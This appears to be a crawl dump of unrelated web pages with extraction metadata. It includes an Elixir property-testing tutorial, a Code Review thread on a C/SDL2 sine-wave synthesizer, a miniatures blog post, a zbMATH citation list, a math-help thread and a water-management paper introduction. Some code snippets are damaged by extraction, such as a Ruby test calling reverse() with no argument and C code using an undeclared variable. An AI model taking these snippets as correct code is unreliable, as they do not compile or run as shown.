• Then you have made a mistake with LTspice. Look at the voltage divider formed by R1, VR1, R2 and remember that Vbe on T1 is about 0.65V. The highest voltage across the circuit is about (((22k + 100k) / 12k) +1) * 0.65V ~= 7.25V – Dwayne Reid Feb 14 '16 at 13:44 | 2021-02-28 21:52:56 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.44843485951423645, "perplexity": 1959.8952890624942}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178361776.13/warc/CC-MAIN-20210228205741-20210228235741-00617.warc.gz"} |
http://www.bruteforcecat.com/posts/learn-elixir-property-test.html | ## Intro
Elixir is an emerging functional programming language which is very suitable for using it in writing distributed system(Whatsapp ,Wooga, Riak) because powerful Erlang VM and OTP framework.
As a Elixir beginner, I would like to start series of learning Elixir. So the first one is property testing.
### Property Testing
Tests allow us to state an expectation and verify that the result of our part of program is as we expected. Most of engineers must be familiar with unit testing. In unit testing, we test the smallest independent unit(usually function) of the application. However, unit testing cannot ensure that our test have met our requirement unless we have written a lot of edge cases.
# spec/reverse_spec.rb
describe "reverse" do
it 'return original if reverse twice with argument [1,2,3]' do
expect(reverse()).to eq(2)
expect(reverse(reverse([1,2,3]))).to eq([1,2,3])
end
it 'return original if reverse twice with argument [9, 2, 3, 1]' do
expect(reverse()).to eq(2)
expect(reverse(reverse([9,2,3,1]))).to eq([9,2,3,1])
end
end
# We will probably stop here but do we cover enough relevant case?
In property testing, the idea is that the test framework will help us randomly generating different argument and run our test . This is particularly common in language having good type system and immutable data structure.
### Using Excheck
The repo is here if you are interested in looking at the code. `
# add quixir to dpes dependencies
defp deps do
[
{:excheck, "~> 0.5", only: :test},
{:triq, github: "triqng/triq", only: :test}
]
end
# install new dependencies
mix deps.get
# test/learning_property_test.exs
defmodule LearningPropertyTestTest do
use ExUnit.Case, async: false
use ExCheck
property "x + 1 is always greater than x" do
for_all x in int(), do: x + 1 >= x
end
property "x * x is always greater than x" do
for_all x in int(), do: x * x > x
end
end
mix test
# LearningPropertyTestTest
# * test x * x is always greater than x_property (8.3ms)
# ....................................................................................................
# 1) test x * x is always greater than x_property (LearningPropertyTestTest)
# test/learning_property_test_test.exs:9
# Expected truthy, got false
# code: ExCheck.check(prop_x * x is always greater than x(), context[:iterations])
# stacktrace:
# test/learning_property_test_test.exs:9: (test)
#
# * test x + 1 is always greater than x_property (2.3ms)
#
# Finished in 0.06 seconds
# 101 tests, 1 failure
The test framework will randomly generate 500 different integers to ensure this property is not broken.
For second test, ExCheck reports that the property failed. There is no counter example for the failing case. However the community is working on it
Now let’s consider a simple Morse encoding module. There are only two public function which are &encode/1 and &decode/1. So if the letters are valid, it should return the same letters after encode and decode it. It is easy to write the test for it as follows:
lib/morse_test.exs
defmodule MorseTest do
use ExUnit.Case, async: false
use ExCheck
@valid_letters Morse.letter_to_morse |> Map.keys
@valid_morses Morse.letter_to_morse |> Map.values
property "encode and decode return the same string if string only contain valid letter" do
for_all letters in list(elements(@valid_letters)) do
sentence = letters |> Enum.join
sentence |> Morse.encode() |> elem(1) |> Morse.decode() |> elem(1) == sentence
end
end
property "decode and encode return the same morses if string only contain valid morses" do
for_all morses in list(elements(@valid_morses)) do
morses_sentence = morses |> Enum.join(" ")
morses_sentence |> Morse.decode() |> elem(1) |> Morse.encode() |> elem(1) == morses_sentence
end
end
end
### Conclusion
The idea of property testing is to think clearly what property our function should hold and let the test framework to help us generate hundreds of test cases to cover edge cases as much as possible. Even though the property test framework in Elixir is still in very beginning stage, I do think it’s good enough to get started with it in any nontrivial project. | 2019-08-21 12:22:39 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2929721474647522, "perplexity": 6853.436008465643}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-35/segments/1566027315936.22/warc/CC-MAIN-20190821110541-20190821132541-00069.warc.gz"} |
https://codereview.stackexchange.com/questions/41086/play-some-sine-waves-with-sdl2/44635 | # Play some sine waves with SDL2
Runs smoothly, however valgrind is showing "possibly lost: 544 bytes in 2 blocks". This is my first time doing a lot of things here so I might be making multiple mistakes.
Please let me know if anything needs to be fixed, or if I should just do something completely different for whatever reason.
/* protosynth
*
* Throughout the source code, "frequency" refers to a Hz value,
* and "pitch" refers to a numeric musical note value with 0 representing C0, 12 for C1, etc..
*
* compiled with:
* gcc -Wall protosynth.c -o protosynth sdl2-config --cflags --libs -lm
*/
#include <stdio.h>
#include <stdlib.h>
#include <math.h>
#include "SDL.h"
const double ChromaticRatio = 1.059463094359295264562;
const double Tao = 6.283185307179586476925;
Uint32 sampleRate = 48000;
Uint32 frameRate = 60;
Uint32 floatStreamLength = 1024;// must be a power of two, decrease to allow for a lower syncCompensationFactor to allow for lower latency, increase to reduce risk of underrun
Uint32 samplesPerFrame; // = sampleRate/frameRate;
Uint32 msPerFrame; // = 1000/frameRate;
double practicallySilent = 0.001;
Uint32 audioBufferLength = 48000;// must be a multiple of samplesPerFrame (auto adjusted upwards if not)
float *audioBuffer;
SDL_atomic_t audioCallbackLeftOff;
Sint32 audioMainLeftOff;
Uint8 audioMainAccumulator;
SDL_AudioDeviceID AudioDevice;
SDL_AudioSpec audioSpec;
SDL_Event event;
SDL_bool running = SDL_TRUE;
typedef struct {
float *waveform;
Uint32 waveformLength;
double volume; // multiplied
double pan; // 0 to 1: all the way left to all the way right
double frequency; // Hz
double phase; // 0 to 1
} voice;
/* _
| |
___ _ __ ___ __ _| | __
/ __| '_ \ / _ \/ _ | |/ /
\__ \ |_) | __/ (_| | <
|___/ .__/ \___|\__,_|_|\_\
| |
|_|
*/
void speak(voice *v) {
float sample;
Uint32 sourceIndex;
double phaseIncrement = v->frequency/sampleRate;
Uint32 i;
if (v->volume > practicallySilent) {
for (i=0; (i+1)<samplesPerFrame; i+=2) {
v->phase += phaseIncrement;
if (v->phase > 1) v->phase -= 1;
sourceIndex = v->phase*v->waveformLength;
sample = v->waveform[sourceIndex]*v->volume;
audioBuffer[audioMainLeftOff+i] += sample*(1-v->pan); //left channel
audioBuffer[audioMainLeftOff+i+1] += sample*v->pan; //right channel
}
}
else {
for (i=0; i<samplesPerFrame; i+=1)
audioBuffer[audioMainLeftOff+i] = 0;
}
audioMainAccumulator++;
}
double getFrequency(double pitch) {
return pow(ChromaticRatio, pitch-57)*440;
}
int getWaveformLength(double pitch) {
return sampleRate / getFrequency(pitch)+0.5f;
}
void buildSineWave(float *data, Uint32 length) {
Uint32 i;
for (i=0; i < length; i++)
data[i] = sin( i*(Tao/length) );
}
void logSpec(SDL_AudioSpec *as) {
printf(
" freq______%5d\n"
" format____%5d\n"
" channels__%5d\n"
" silence___%5d\n"
" samples___%5d\n"
" size______%5d\n\n",
(int) as->freq,
(int) as->format,
(int) as->channels,
(int) as->silence,
(int) as->samples,
(int) as->size
);
}
void logVoice(voice *v) {
printf(
" waveformLength__%d\n"
" volume__________%f\n"
" pan_____________%f\n"
" frequency_______%f\n"
" phase___________%f\n",
v->waveformLength,
v->volume,
v->pan,
v->frequency,
v->phase
);
}
void logWavedata(float *floatStream, Uint32 floatStreamLength, Uint32 increment) {
printf("\n\nwaveform data:\n\n");
Uint32 i=0;
for (i=0; i<floatStreamLength; i+=increment)
printf("%4d:%2.16f\n", i, floatStream[i]);
printf("\n\n");
}
/* _ _ _____ _ _ _ _
| (_) / ____| | | | | | |
__ _ _ _ __| |_ ___ | | __ _| | | |__ __ _ ___| | __
/ _ | | | |/ _ | |/ _ \| | / _ | | | '_ \ / _ |/ __| |/ /
| (_| | |_| | (_| | | (_) | |___| (_| | | | |_) | (_| | (__| <
\__,_|\__,_|\__,_|_|\___/ \_____\__,_|_|_|_.__/ \__,_|\___|_|\_\
*/
void audioCallback(void *unused, Uint8 *byteStream, int byteStreamLength) {
float* floatStream = (float*) byteStream;
Sint32 localAudioCallbackLeftOff = SDL_AtomicGet(&audioCallbackLeftOff);
Uint32 i;
for (i=0; i<floatStreamLength; i++) {
floatStream[i] = audioBuffer[localAudioCallbackLeftOff];
localAudioCallbackLeftOff++;
if ( localAudioCallbackLeftOff == audioBufferLength )
localAudioCallbackLeftOff = 0;
}
//printf("localAudioCallbackLeftOff__%5d\n", localAudioCallbackLeftOff);
SDL_AtomicSet(&audioCallbackLeftOff, localAudioCallbackLeftOff);
}
/*_ _ _
(_) (_) |
_ _ __ _| |_
| | '_ \| | __|
| | | | | | |_
|_|_| |_|_|\__|
*/
int init() {
SDL_Init(SDL_INIT_AUDIO | SDL_INIT_TIMER);
SDL_AudioSpec want;
SDL_zero(want);// btw, I have no idea what this is...
want.freq = sampleRate;
want.format = AUDIO_F32;
want.channels = 2;
want.samples = floatStreamLength;
want.callback = audioCallback;
AudioDevice = SDL_OpenAudioDevice(NULL, 0, &want, &audioSpec, SDL_AUDIO_ALLOW_FORMAT_CHANGE);
if (AudioDevice == 0) {
printf("\nFailed to open audio: %s\n", SDL_GetError());
return 1;
}
printf("want:\n");
logSpec(&want);
printf("audioSpec:\n");
logSpec(&audioSpec);
if (audioSpec.format != want.format) {
printf("\nCouldn't get Float32 audio format.\n");
return 2;
}
sampleRate = audioSpec.freq;
floatStreamLength = audioSpec.size/4;
samplesPerFrame = sampleRate/frameRate;
msPerFrame = 1000/frameRate;
audioMainLeftOff = samplesPerFrame*8;
SDL_AtomicSet(&audioCallbackLeftOff, 0);
if (audioBufferLength % samplesPerFrame)
audioBufferLength += samplesPerFrame-(audioBufferLength % samplesPerFrame);
audioBuffer = malloc( sizeof(float)*audioBufferLength );
return 0;
}
int onExit() {
SDL_CloseAudioDevice(AudioDevice);
//free(audioBuffer);//not necessary?
SDL_Quit();
return 0;
}
/* _
(_)
_ __ ___ __ _ _ _ __
| '_ _ \ / _ | | '_ \
| | | | | | (_| | | | | |
|_| |_| |_|\__,_|_|_| |_|
*/
int main(int argc, char *argv[]) {
float syncCompensationFactor = 0.0016;// decrease to reduce risk of collision, increase to lower latency
Uint32 i;
voice testVoiceA;
voice testVoiceB;
voice testVoiceC;
testVoiceA.volume = 1;
testVoiceB.volume = 1;
testVoiceC.volume = 1;
testVoiceA.pan = 0.5;
testVoiceB.pan = 0;
testVoiceC.pan = 1;
testVoiceA.phase = 0;
testVoiceB.phase = 0;
testVoiceC.phase = 0;
testVoiceA.frequency = getFrequency(45);// A3
testVoiceB.frequency = getFrequency(49);// C#4
testVoiceC.frequency = getFrequency(52);// E4
Uint16 C0waveformLength = getWaveformLength(0);
testVoiceA.waveformLength = C0waveformLength;
testVoiceB.waveformLength = C0waveformLength;
testVoiceC.waveformLength = C0waveformLength;
float sineWave[C0waveformLength];
buildSineWave(sineWave, C0waveformLength);
testVoiceA.waveform = sineWave;
testVoiceB.waveform = sineWave;
testVoiceC.waveform = sineWave;
//logVoice(&testVoiceA);
//logWavedata(testVoiceA.waveform, testVoiceA.waveformLength, 10);
if ( init() ) return 1;
SDL_Delay(42);// let the tubes warm up
SDL_PauseAudioDevice(AudioDevice, 0);// unpause audio.
while (running) {
while( SDL_PollEvent( &event ) != 0 ) {
if( event.type == SDL_QUIT ) {
running = SDL_FALSE;
}
}
for (i=0; i<samplesPerFrame; i++) audioBuffer[audioMainLeftOff+i] = 0;
//printf("audioMainLeftOff___________%5d\n", audioMainLeftOff);
speak(&testVoiceA);
speak(&testVoiceB);
speak(&testVoiceC);
if (audioMainAccumulator > 1) {
for (i=0; i<samplesPerFrame; i++) {
audioBuffer[audioMainLeftOff+i] /= audioMainAccumulator;
}
}
audioMainAccumulator = 0;
audioMainLeftOff += samplesPerFrame;
if (audioMainLeftOff == audioBufferLength) audioMainLeftOff = 0;
if (mainAudioLead < floatStreamLength) printf("An audio collision may have occured!\n");
}
onExit();
return 0;
}
EDIT:
After doing some more research on my valgrind errors, I came to the conclusion that there wasn't much I could do other than suppress them. Here is my suppression file:
{
<from SDL_TimerInit>
Memcheck:Leak
match-leak-kinds: possible
fun:calloc
fun:allocate_dtv
fun:_dl_allocate_tls
fun:SDL_TimerInit
fun:SDL_InitSubSystem
fun:init
fun:main
}
{
<from SDL_AudioInit>
Memcheck:Leak
match-leak-kinds: possible
fun:calloc
fun:allocate_dtv
fun:_dl_allocate_tls
fun:pa_simple_new
fun:PULSEAUDIO_Init
fun:SDL_AudioInit
fun:SDL_InitSubSystem
fun:init
fun:main
}
• ASCII art comments? That just repeat the names of the functions? Argh, my eyes... – Ant Feb 6 '14 at 18:11
• haha, sorry, Ant. Those are just to make it easier to navigate until I break it down into multiple files. Then I won't need them. – Duovarious Feb 6 '14 at 18:58
# Things you did well
• Nicely formatted, easy to read.
• Use of typedef with structures.
# Things you could improve
### Preprocessor:
• Since SDL.h isn't one of your own pre-defined header files, you should be searching for it in directories pre-designated by the compiler (since that is where it should be stored).
#include <SDL/SDL.h>
In the C standard, §6.10.2, paragraphs 2 to 4 state:
• A preprocessing directive of the form
#include <h-char-sequence> new-line
searches a sequence of implementation-defined places for a header identified uniquely by the specified sequence between the < and > delimiters, and causes the replacement of that directive by the entire contents of the header. How the places are specified or the header identified is implementation-defined.
• A preprocessing directive of the form
#include "q-char-sequence" new-line
causes the replacement of that directive by the entire contents of the source file identified by the specified sequence between the " delimiters. The named source file is searched for in an implementation-defined manner. If this search is not supported, or if the search fails, the directive is reprocessed as if it read
#include <h-char-sequence> new-line
with the identical contained sequence (including > characters, if any) from the original directive.
• A preprocessing directive of the form
#include pp-tokens new-line
(that does not match one of the two previous forms) is permitted. The preprocessing tokens after include in the directive are processed just as in normal text. (Each identifier currently defined as a macro name is replaced by its replacement list of preprocessing tokens.) The directive resulting after all replacements shall match one of the two previous forms. The method by which a sequence of preprocessing tokens between a < and a > preprocessing token pair or a pair of " characters is combined into a single header name preprocessing token is implementation-defined.
Definitions:
• h-char: any member of the source character set except the new-line character and >
• q-char: any member of the source character set except the new-line character and "
Don't forget to include -lSDL with gcc to link your code to the SDL library.
### Variables/Initialization:
• Tao is simple 2π, as you have defined in your code.
const double Tao = 6.283185307179586476925;
However, π is a mathematically defined constant in math.h. Since you are already using that header, you should utilize the predefined constant.
const double TAO = 2 * M_PI;
### Memory:
• You allocate memory to audioBuffer(), but then never free() it,
audioBuffer = malloc( sizeof(float)*audioBufferLength );
// free(audioBuffer); //not necessary?
This would be my guess as to what valgrind is whining about. You should always have freed all memory that you have allocated before you exit your program; we want to avoid memory leaks.
Now to adress your comment as to whether or not that line of code is necessary, since you are exiting your program anyways. It depends on the operating system. The majority of modern (and all major) operating systems will free memory not freed by the program when it ends.
Relying on this is bad practice and it is better to free() it explicitly. The issue isn't just that your code looks bad. You may decide you want to integrate your small program into a larger, long running one. Then a while later you have to spend hours tracking down memory leaks.
Relying on a feature of an operating system also makes the code less portable.
### Syntax/Styling:
• Right now you are using Uint32 to represent an unsigned 32 bit integer, but uint32_t is the type that's defined by the C standard.
uint32_t sampleRate = 48000;
• Define i within your for loops, not outside.(C99)
for (uint32_t i = 0; (i+1) < samplesPerFrame; i += 2)
• typedef structs typically have a capitalized name by standard conventions.
typedef struct
{
float *waveform;
Uint32 waveformLength;
double volume; // multiplied
double pan; // 0 to 1: all the way left to all the way right
double frequency; // Hz
double phase; // 0 to 1
} Voice;
• Declare all of your parameters as void when you don't take in any arguments.
int init(void)
• You aren't using the parameters specified in main().
int main(int argc, char *argv[])
Declare them as void if you aren't going to use them.
int main(void)
• Use puts() instead of printf() when you aren't formatting your output.
printf("\n\nwaveform data:\n\n");
puts("Waveform data: ");
• Remove != 0 in some of your conditional tests for maximum C-ness.
/* _ _ _____ _ _ _ _
| (_) / ____| | | | | | |
__ _ _ _ __| |_ ___ | | __ _| | | |__ __ _ ___| | __
/ _ | | | |/ _ | |/ _ \| | / _ | | | '_ \ / _` |/ __| |/ /
| (_| | |_| | (_| | | (_) | |___| (_| | | | |_) | (_| | (__| <
\__,_|\__,_|\__,_|_|\___/ \_____\__,_|_|_|_.__/ \__,_|\___|_|\_\
*/
You said in the comments that: "Those are just to make it easier to navigate until I break it down into multiple files. Then I won't need them."
Let me suggest another alternative that you can keep around: documenting your code with Doxygen. Replacing your ASCII art comments with documentation of your methods will make it easier to navigate, and serve the very important purpose of stating why/how you programmed something a certain way.
I've taken an example from one of my previous questions to use here.
/**
* @fn static void json_fillToken(JsonToken *token, JsonType type, int start, int end)
* @brief Fills token type and boundaries.
* @param token
* @param type
* @param start
* @param end
*/
static void json_fillToken(JsonToken *token, JsonType type, int start, int end)
{
token->type = type;
token->start = start;
token->end = end;
token->size = 0;
}
• Remove old commented out code.
//logVoice(&testVoiceA);
//logWavedata(testVoiceA.waveform, testVoiceA.waveformLength, 10);
It serves almost no purpose, and makes your code look cluttered.
• Besides your ASCII art comments and your old commented out code, you have only a few other comments throughout your source code. See this blog post here as to why and how you should comment throughout your code.
### Exiting:
• You have a function dedicated to termination, and you call it right before you close down your program.
int onExit() {
SDL_CloseAudioDevice(AudioDevice);
//free(audioBuffer);//not necessary?
SDL_Quit();
return 0;
}
I think you could make great use of the atexit() function in your code. The atexit() function registers a function to be called at normal program termination. Though if you decide to use this, you may want to rename onExit() to something such as cleanup() or something similar.
int main(void)
{
...
atexit(cleanup);
return 0;
}
• However, π is a mathematically defined constant in math.h. Not according to the standard, it's not. It's a very common extension, but it's not guaranteed to be defined. – Corbin Mar 18 '14 at 4:31
• Thanks! I went ahead and made a lot of the changes you suggested. The free(audioBuffer) line wasn't the source of the valgrind error, but I've uncommented it anyway for the other reasons you mentioned, and added more info regarding this in my original post. Also, <SDL/SDL.h> didn't work, but <SDL.h> did. – Duovarious Mar 18 '14 at 7:43
• M_PI is non-standard. See stackoverflow.com/questions/26065359/… – Pharap Oct 13 at 19:52 | 2019-12-15 01:10:38 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.30155041813850403, "perplexity": 13624.02189091377}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575541297626.61/warc/CC-MAIN-20191214230830-20191215014830-00478.warc.gz"} |
https://xulutec.blogspot.com/2016/02/15mm-sci-fi.html | ## Freitag, 19. Februar 2016
### 15mm Sci-Fi
My first venture into 15mm :-) White Dragon troopers, incredibly detailed for figures that size. I dont have much experience with 15mm figures but I think most 15mm figures I know are rather 18mm and these are "true" 15mm, i. e. at the delicate end of that scale - see last comparison pic with a 20mm TQD soldier.
#### Kommentare:
1. Hello,
Very nice troupers !!! I like the contrast between soldiers and brown/red base !!
Nikko
1. Thanks, yes, like halo on mars ;-)
2. Great painted minis!
3. Those look great! I've been thinking of trying 15mm SCI Fi and maybe I'll give these a try.
Christopher | 2021-05-08 20:29:29 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8575972318649292, "perplexity": 14124.444120991093}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-21/segments/1620243988923.22/warc/CC-MAIN-20210508181551-20210508211551-00288.warc.gz"} |
https://zbmath.org/?q=an%3A0042.11702 | # zbMATH — the first resource for mathematics
Additive functionals on a space of continuous functions. I. (English) Zbl 0042.11702
##### Keywords:
functional analysis
Full Text:
##### References:
[1] R. H. Cameron and W. T. Martin, An expression for the solution of a class of non-linear integral equations, Amer. J. Math. 66 (1944), 281 – 298. · Zbl 0063.00697 [2] R. H. Cameron and W. T. Martin, Transformations of Wiener integrals under translations, Ann. of Math. (2) 45 (1944), 386 – 396. · Zbl 0063.00696 [3] R. H. Cameron and W. T. Martin, The Wiener measure of Hilbert neighborhoods in the space of real continuous functions, J. Math. Phys. Mass. Inst. Tech. 23 (1944), 195 – 209. · Zbl 0060.29103 [4] R. H. Cameron and W. T. Martin, The orthogonal development of non-linear functionals in series of Fourier-Hermite functionals, Ann. of Math. (2) 48 (1947), 385 – 392. · Zbl 0029.14302 [5] Ross E. Graves, Integral representations of linear and weak linear functionals defined over the Wiener space $$C$$, doctoral dissertation (unpublished), University of Minnesota, 1948. [6] A. Kolmogoroff, Über die Summen durch den Zufall bestimmter unabhängiger Größen, Math. Ann. 99 (1928), no. 1, 309 – 319 (German). · JFM 54.0543.05 [7] R. E. A. C. Paley, N. Wiener, and A. Zygmund, Notes on random functions, Math. Z. 37 (1933), no. 1, 647 – 668. · Zbl 0007.35402 [8] Norbert Wiener, Generalized harmonic analysis, Acta Math. 55 (1930), no. 1, 117 – 258. · JFM 56.0954.02 [9] Gisiro Maruyama, Notes on Wiener integrals, Kōdai Math. Sem. Rep. 2 (1950), 41 – 44. {Volume numbers not printed on issues until Vol. 7 (1955).}. · Zbl 0045.21302
This reference list is based on information provided by the publisher or from digital mathematics libraries. Its items are heuristically matched to zbMATH identifiers and may contain data conversion errors. It attempts to reflect the references listed in the original paper as accurately as possible without claiming the completeness or perfect precision of the matching. | 2021-10-17 21:43:51 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8058537244796753, "perplexity": 1295.5350737534814}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323585183.47/warc/CC-MAIN-20211017210244-20211018000244-00365.warc.gz"} |
http://mathhelpforum.com/algebra/222096-can-t-figure-out-these-problems.html | # Thread: Can't figure out these problems
1. ## Can't figure out these problems
I've got these two problems which I can't seem to figure out. I've tried different ways of doing them but none give me the correct answer.
Here is the first problem
f(x) = 6.0 - 8.0x2; find f(9.0 x 10.0) - [9.0f(10.0)]2
And the second
A conical sheet metal hood is to cover an area 1.0 m in diameter. What is the surface area of the hood if its height is 8.0?
There are a number of questions similar to the first, so I'm hoping once I figure out how to do this one the others will make more sense.
Thanks for any help!
2. ## Re: Can't figure out these problems
If $f(x)=6-8x^2$
then $f(90)=6-8\times90^2=-64794$
and $f(10)=6-8\times10^2=-794$
So with that information
$f(9.0 \times 10.0) - (9.0f(10.0))^2=f(90)-(9f(10))^2$
$f(90)-(9f(10))^2=-64794-(9\times(-794))^2=-64794-51065316 =-51130110$
In the second question the curved surface area of a cone is equal to $\pi r\sqrt{r^2+h^2}$ where r is the radius of the base and h is the height.
4. ## Re: Can't figure out these problems
ah ty for the help, Im able to do all the questions similar to the first now, and also feel pretty dumb about the second... didnt even clue in that conical meant cone so I was trying to figure out the area for other shapes and seeing if they matched any of the answers lol | 2016-09-25 18:35:31 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 6, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6613651514053345, "perplexity": 456.10805439911803}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-40/segments/1474738660338.16/warc/CC-MAIN-20160924173740-00101-ip-10-143-35-109.ec2.internal.warc.gz"} |
https://iwaponline.com/wp/article/20/6/1145/62883/Group-multicriteria-model-for-allocating-resources | ## Abstract
The world is facing a growing water scarcity problem in the most diverse regions. The Rio Grande do Norte (RN), a Brazilian semi-arid region, is facing its severest drought in the last 100 years. Given this context, managing water resources and combating the effects of the drought have become even more important. Decisions made in this context may involve multiple criteria established by more than one decision-maker. To tackle this issue, a multicriteria model for group decisions is proposed in order to rank the municipalities of the region and thus guide the public administration's efforts in tackling the drought and mitigating its effects. The applicability of the model is exemplified by studying the Apodi-Mossoró river basin, for which the PROMETHEE GDSS method was selected and the preferences of three decision-makers were calculated.
## Introduction
Conflicts over the use of water are not inherent to the modern world: they have recurred throughout history. According to Ferguson et al. (2013), water systems in cities around the world are facing environmental and societal pressures such as water scarcity, decaying waterways, floods, changing demographics, and an infrastructure that is aging. Dong et al. (2016) emphasize that rapid urbanization and population growth have resulted in a serious global shortage of water and in the environment deteriorating. The scarcity of fresh water is related to several factors and has become a major concern in various parts of the world. According to Buurman et al. (2016), rationing water and disruptions in its supply can cripple production processes, and communities may incur additional prohibitive costs when seeking alternative sources of water. Boggia & Rocchi (2010) note that because water is scarce and there are different interests and stakeholders involved, this calls for more complex water management due to the presence of legal rights and economic interests that must be considered during the decision-making process.
The situation becomes even more complicated in places that are affected by long periods of drought, such as northeast Brazil. The lack of rainfall means that reservoirs are not regularly replenished with water, thus making it difficult to manage water resources. WMO & GWP (2016) state that droughts are a normal part of the climate and can occur in any climate pattern in the world. Droughts are one of the costliest natural hazards and have significant impacts that affect many economic sectors and people simultaneously. Hong et al. (2016) state that droughts can evolve into a natural disaster depending on the duration and the resulting negative socioeconomic effects.
According to Wilhite et al. (2014), responses to droughts in all parts of the world have generally been reactive and taken a crisis management approach. Pischke & Stefanski (2016) argue that this reactive, or crisis management, approach is untimely, poorly coordinated, and not integrated and, moreover, such an approach provides negative incentives for adapting to a changing climate. Hong et al. (2016) state that to implement effective drought management measures, public authorities need to adopt a holistic and integrated approach.
The Brazilian semi-arid region, which is found in the northeast, is home to approximately 12% of the country's population (about 25 million people) and has natural characteristics that create unfavorable conditions regarding the water balance. High temperatures, low thermal amplitudes, strong insolation, and high evapotranspiration rates as well as low rainfall and infrequent rains result in rivers often having little or no water for use by humans whether domestically or for agricultural or industrial purposes. After four consecutive years of low precipitation, the region is in a critical situation since the rainfall indexes of the last years were insufficient to maintain adequate levels of water in reservoirs (ANA, 2016).
